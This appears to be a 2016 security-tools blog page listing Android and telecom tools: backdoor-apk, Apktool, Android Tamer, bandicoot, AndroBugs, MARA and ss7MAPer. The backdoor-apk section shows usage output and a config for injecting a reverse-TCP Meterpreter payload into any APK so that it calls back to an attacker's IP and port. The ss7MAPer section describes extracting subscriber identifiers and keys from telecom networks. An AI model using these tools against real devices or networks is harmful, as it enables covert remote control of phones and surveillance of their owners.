Thursday, August 4, 2016

Backdoor Android APK: backdoor-apk


 backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.


Usage
root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk 
[*] Generating reverse tcp meterpreter payload...done.
[+] Handle the meterpreter connection at: 10.6.9.31:1337
[*] Decompiling original APK file...done.
[*] Decompiling RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Merging permissions of original and payload projects...done.
[*] Recompiling original project with backdoor...done.
[*] Signing recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#

The recompiled APK will be found in the ‘original/dist’ directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection at the specified IP and port.

Backdoor Android APK Requirements:

In addition to the obvious tools/utilities  in use the following packages were also required on Kali Linux
apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Example

./backdoor-apk.sh original.apk

Config

modify the following values as necessary
MSFVENOM=msfvenom
LHOST="10.6.9.31"
LPORT="1337"
APKTOOL=apktool2
MY_PATH=`pwd`
ORIG_APK_FILE=$1
RAT_APK_FILE=Rat.apk
LOG_FILE=run.log



Download

Reverse Engineering Android apk Files: Apktool


Reverse Engineering Android apk Files

ApkTool is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.

It is NOT intended for piracy and other non-legal uses. It could be used for localizing, adding some features or support for custom platforms and other GOOD purposes. Just try to be fair with authors of an app, that you use and probably like.

Features

  • Disassembling resources to nearly original form (including resources.arsc, classes.dex, 9.png. and XMLs)
  • Rebuilding decoded resources back to binary APK/JAR
  • Organizing and handling APKs that depend on framework resources
  • Smali Debugging (to be removed in 2.1.0 in favor of IdeaSmali)
  • Helping with repetitive tasks

Requirements

  • Java 7 (JRE 1.7)
  • Basic knowledge of Android SDK, AAPT and smali

How to Build Apktool from source

Apktool is a collection of 1 project, containing 4 sub-projects and a few dependencies.
  • brut.apktool.lib – (Main, all the Library code)
  • brut.apktool.cli – The cli interface of the program
  • brut.j.dir – Utility project
  • brut.j.util – Utility project
  • brut.j.common – Utility project
The main project can be found below

Requirements

  • JDK (1.7)
  • git

Build Steps

We use gradle to build. It’s pretty easy. First clone the repository.
  1. git clone git://github.com/iBotPeaches/Apktool.git
  2. cd Apktool
  3. For steps 3-5 use ./gradlew for unix based systems or gradlew.bat for windows.
  4. [./gradlew][gradlew.bat] build fatJar – Builds Apktool, including final binary.
  5. Optional (You may build a Proguard jar) [./gradlew][gradlew.bat] build fatJar proguard
After 1-2 minutes you should have a jar file at
./brut.apktool/apktool-cli/build/libs/apktool-xxxxx.jar


Download

Live Platform for Android Security Professionals: Android Tamer


Live Platform for Android Security Professionals

      AndroidTamer started out as a VirtualMachine for Android Security Professionals.  This Environment allows people to work on large array of android security related task’s ranging from Malware Analysis, Penetration Testing and Reverse Engineering. AndroidTamer is, at this point the only fully non-commercial non-sponsored entity in Android Security ecosystem.
Android Tamer can work with as little as 512Mb RAM, however if you plan on keeping the eclipse environment running it is suggested to pack at east 1G – 1.5G ram.  Customized to the core, Debian 8 based virtual machine environment is preloaded with tools for Android Pentesting.  AndroidTamer Virtual Machine is a 5.1 GB OVA file ! A lot can be stored in 5GB and you can find all the tools stored inside /Arsenal Folder. Repos have been tested on Debian 8 and they should also work on Kali Linux and Ubuntu 14.04 or 16.04.


Features

  • VirtualBox
  • Android
  • Security
  • Pentesting
  • Malware Analysis
  • Dynamic Analysis
  • Static Analysis
  • Development

Details
  • Debian 8 Base
  • Own repository of tools (repo.androidtamer.com)
  • Signed packages and repository
  • additional Wrappers around useful tools to make life easier
  • everything in path


AndroidTamer Repository in Debian 8

How to configure
$ echo "deb https://repo.androidtamer.com Tamer4 main" | sudo tee  /etc/apt/sources.list.d/repo_androidtamer_com.list
Adding GPG Key
wget -qO - https://androidtamer.com/repo.gpg.key | sudo apt-key add -
Enable HTTPS Debian repositories
sudo apt-get install apt-transport-https
How to install pacakges
$ sudo apt-get update
$ sudo apt-get install <package name>

Default username and password?

username: android
password: tamer
android user has sudo access


Download

Analyze Mobile Phone Metadata: bandicoot


Analyze Mobile Phone Metadata with  bandicoot

     bandicoot (http://bandicoot.mit.edu ) is Python toolbox to analyze mobile phone metadata. It provides a complete, easy-to-use environment for data-scientist to analyze mobile phone metadata. With only a few lines of code, load your datasets, visualize the data, perform analyses, and export the results. It includes an interactive visualization, support for mobile phone recharges, support for Python 3, and clustering algorithms to handle both antenna and GPS locations.
bandicoot provides a complete, easy-to-use environment for data-scientist to analyze mobile phone metadata. With only a few lines of code, load your datasets, visualize the data, perform analyses, and export the results.  There are 1400+ behavioral indicators that are falling into three categories: individual(e.g. number of calls, text response rate), spatial (e.g. radius of gyration, entropy of places), and social network (e.g. clustering coefficient).  bandicoot also has built-in visualization tools. Load a user’s file and visualize his social graph, mobility pattern, and interactions. Check out our IPython notebook for live examples.

Try bandicoot on your phone ?

You can use  Android application to export all your call and text logs into a CSV file. This file can then be imported into the bandicoot toolbox for analysis and visualization.


Dependencies

bandicoot has no dependencies, which allows users to easily compute indicators on a production machine. To run tests and compile the visualization, optional dependencies are needed:

The source code is currently hosted on Github at https://github.com/yvesalexandre/bandicoot. Binary installers for the latest released version are available at the Python package index:
http://pypi.python.org/pypi/bandicoot/
And via easy_install:
easy_install bandicoot
or pip:
pip install bandicoot

AndroBugs Framework


AndroBugs Framework

    AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. No splendid GUI interface, but the most efficient (less than 2 minutes per scan in average) and more accurate.



Features:

  • Find security vulnerabilities in an Android app
  • Check if the code is missing best practices
  • Check dangerous shell commands (e.g. “su”)
  • Collect Information from millions of apps
  • Check the app’s security protection (marked as <Hacker>, designed for app repackaging hacking)

Requirements

  • Python 2.7.x (DO NOT USE Python 3.X)
  • PyMongo library (If you want to use the massive analysis tool)

androBug Framework ScreenShot


Setup Steps and Usage for Windows


Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework
  1. mkdir C:\AndroBugs_Framework
  2. cd C:\AndroBugs_Framework
  3. Unzip the latest Windows version of AndroBugs Framework from Windows releases
  4. Go to Computer->System Properties->Advanced->Environment Variables. Add “C:\AndroBugs_Framework” to the “Path” variable
  5. androbugs.exe -h
  6. androbugs.exe -f [APK file]

Usage for Unix/Linux


To run the AndroBugs Framework:
python androbugs.py -f [APK file]
To check the usage:
python androbugs.py -h

Usage of Massive Analysis Tools for Unix/Linux


Prerequisite: Setup MongoDB and config your own MongoDB settings in “androbugs-db.cfg”
To run the massive analysis for AndroBugs Framework:
python AndroBugs_MassiveAnalysis.py -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -d [APKs input directory] -o [Report output directory]
Example:
python AndroBugs_MassiveAnalysis.py -b 20151112 -t BlackHat -d ~/All_Your_Apps/ -o ~/Massive_Analysis_Reports
To get the summary report and all the vectors of massive analysis:
python AndroBugs_ReportSummary.py -m massive -b [Your_Analysis_Number] -t [Your_Analysis_Tag]
Example:
python AndroBugs_ReportSummary.py -m massive -b 20151112 -t BlackHat

Mobile Application Reverse Engineering: MARA


Mobile Application Reverse engineering and Analysis Framework

    MARA is a Mobile Application Reverse engineering and Analysis Framework. It is a tool that puts together commonly used mobile application reverse engineering tools, in order to make the task or reverse engineering and analysis easier and friendly to mobile application developers and security professionals.



Features supported
  • Reverse engineer apk files to smali, java jar files, java source code and dalvik bytecode (jadx format)
  • Reverse engineer dex, jar and class files into java source code and dalvik bytecode (jadx format)
  • Statically Analyze java source code and dalvik bytecode
  • Scan for apk vulnerabilities via androbugs
  • Scan ssl domains found in the app via the standalone SSL scanner that makes use of pyssltest and testssl

Installing MARA on Linux


MARA ships with a script that assists in downloading and installing the dependencies above. Simply run the setup.sh script with sudo privilege and it will install them.
The following are the requirements for running MARA. The domain SSL scanning component requires an active internet connection. MARA works with Open JDK or Oracle JDK. We recommend version 7 and above when using either of them.

Java JDK
sudo apt-get -y install openjdk-7-jdk 

Tree
sudo apt-get -y install tree

Install 32bit libs
sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get -y install libgtk2.0-0:i386 libxxf86vm1:i386 libsm6:i386 lib32stdc++6

Figlet
sudo apt-get -y install figlet
sudo cp tools/figlet/doom.flf /usr/share/figlet

Smalisca
sudo pip install smalisca
Unirest
sudo pip install unirest

AHA – Ansi HTML Adapter
sudo apt-get -y install aha

Python3
apt-get install -y python3

Androwarn dependencies
sudo apt-get -y install python python-jinja2 git

Smali graph generation dependency
pip install pydot



After meeting all the requirements. If you run ./mara.sh –help you should see the MARA help menu as shown below.

mara

     MARA ships with a SSL scanner script that makes use of pyssltest and testssl. The stand alone SSL scanner can be run using the command ./ssl_scanner.sh and follow the instructions displayed. The findings from the scan are dumped in the domain scans folder i.e./MARA_Framework/data/domain_scans/
     While analyzing APK files, MARA provides the option of scanning domains found in the apk using the above mentioned tools. This scan runs in the background and can be skipped. In the event the scan is performed, the user is required to tail the two log files i.e pyssltest.log and testssl.log in/MARA_Framework/data/apk_name/analysis/static/ssl_scan/log/

SS7 Pentesting Toolkit: ss7MAPer


SS7 Pentesting Toolkit

     The toolkit is build upon the Osmocom SS7 stack and implements some basic MAP messages. At its current state tests against the HLR are ready for use, in future versions tests against VLR, MSCand SMSC will follow. The tool is written in Erlang; to get it running you will need the Erlang runtime environment. It is developed for version 17.5.
Signalling System No. 7 (SS7) is a set of telephony signaling protocols developed in 1975, which is used to set up and tear down most of the world’s public switched telephone network (PSTN) telephone calls. It also performs number translation, local number portability, prepaid billing, Short Message Service (SMS), and other mass market services.



SS7 Pentesting Toolkit: ss7MAPer

    As you can see in the picture, the demonstrated test cases for the HLR respond to most of the MAP messages regardless the fact that we are not registered as valid provider. The tool is not configured as a serving MSC nor a roaming contractor. Some of the information gathered can be seen as critical, as the MSISD -> IMSI resolution, the over-the-air crypto keys or the ability to create supplementary services e.g. call forwarding.
The messages and test cases are gathered from public SS7 research of the last years (see 1, 2) and check for known weaknesses in the SS7 domain. The tool itself was developed under a cooperation with the Belgium provider Proximus and aims to test the secure configuration of the internal and external SS7 network access. Thanks a lot for giving us the opportunity here, we are convinced that the tool gives the research community but also telecommunication providers a new, important and (especially) open-source-based possibility for SS7 testing.

Get it running

You will need:
  • Erlang. Get it from your repo or from http://www.erlang.org
  • Rebar. Get it from your repo or from https://github.com/rebar/rebar
  • The code (;
    git clone https://github.com/ernw/ss7MAPer   
  • The dependencies
    cd ss7MAPer   
    rebar get-deps
  • Patch the dependencies
    cd deps/osmo_map   
    patch -p1 < ../../patches/osmo_map.patch
    cd ../osmo_sccp
    patch -p1 < ../../patches/osmo_sccp.patch
    cd ../osmo_ss7
    patch -p1 < ../../patches/osmo_ss7.patch
  • Get the deps to build (; This is not as easy as it might sound, I needed to:
    Patch the epacp/rebar.config and replace
    {port_envs, [   
    {"DRV_CFLAGS", "-g -Wall $ERL_CFLAGS"},
    {"DRV_LDFLAGS", "-lpcap $ERL_LDFLAGS"}
    ]}.
    with
    {port_envs, [   
    {"CFLAGS", "-g -Wall $ERL_CFLAGS"},
    {"LDFLAGS", "-lpcap $ERL_LDFLAGS"}
    ]}.
    Another dependency is not covered by rebar, so you need to fetch it manually:
    cd deps   
    git clone http://cgit.osmocom.org/erlang/signerl/
    Build the ASN.1 source files:
    cd deps/signerl/TCAP/asn_src/ITU   
    make
    Copy the ASN.1 files to osmo_sccp:
    cp deps/signerl/TCAP/asn_src/ITU/*rl deps/osmo_sccp/src/   
    Also the osmo libs have dependencies on each other and some other deps are shared, so I created some symlinks:
    mkdir deps/osmo_sccp/deps   
    ln -sd ../../osmo_ss7 deps/osmo_sccp/deps/osmo_ss7
    ln -sd ../../epcap deps/osmo_sccp/deps/epcap
    ln -sd ../../pkt deps/osmo_sccp/deps/pkt
    ln -sd ../../signerl/MAP deps/osmo_sccp/deps/MAP
    ln -sd ../../signerl/SCCP deps/osmo_sccp/deps/SCCP
    ln -sd ../../signerl/TCAP deps/osmo_sccp/deps/TCAP
    mkdir deps/osmo_map/deps
    ln -sd ../../osmo_ss7 deps/osmo_map/deps/osmo_ss7
    ln -sd ../../epcap deps/osmo_map/deps/epcap
    ln -sd ../../pkt deps/osmo_map/deps/pkt
    And copy some files in place:
    cp deps/signerl/SCCP/itu/include/sccp.hrl deps/osmo_sccp/src/   
    cp deps/signerl/TCAP/include/tcap.hrl deps/osmo_map/src/
  • Build the code
    rebar co   

The config file

The config file is split in 4 section, sctp, m3ua, sccp and target.
In the sctp section source and destination ip as well as source and destination port of the SCTP connection are configured.
In the m3ua section all the M3UA parameters, like local and remote point code are configured.
In the sccp section currently only the local (or source) global title needs to be configured.
Last but not least in the target section information about the tested environment need to be configured, like the global title of the HLR, or the MSISDN of the tested phone.
Be sure to modify it to your needs.

Running the tool

To run the tool one needs to start a rebar shell:
cd ss7MAPer   
rebar shell
Then the SIGTRAN connection needs to be established:
Pid = ss7test_app:start(1, "./configfile").   
If everything is set up correctly the m3ua connection comes up.
To run the HLR tests, simply enter:
Pid ! {test_hlr}.   
Download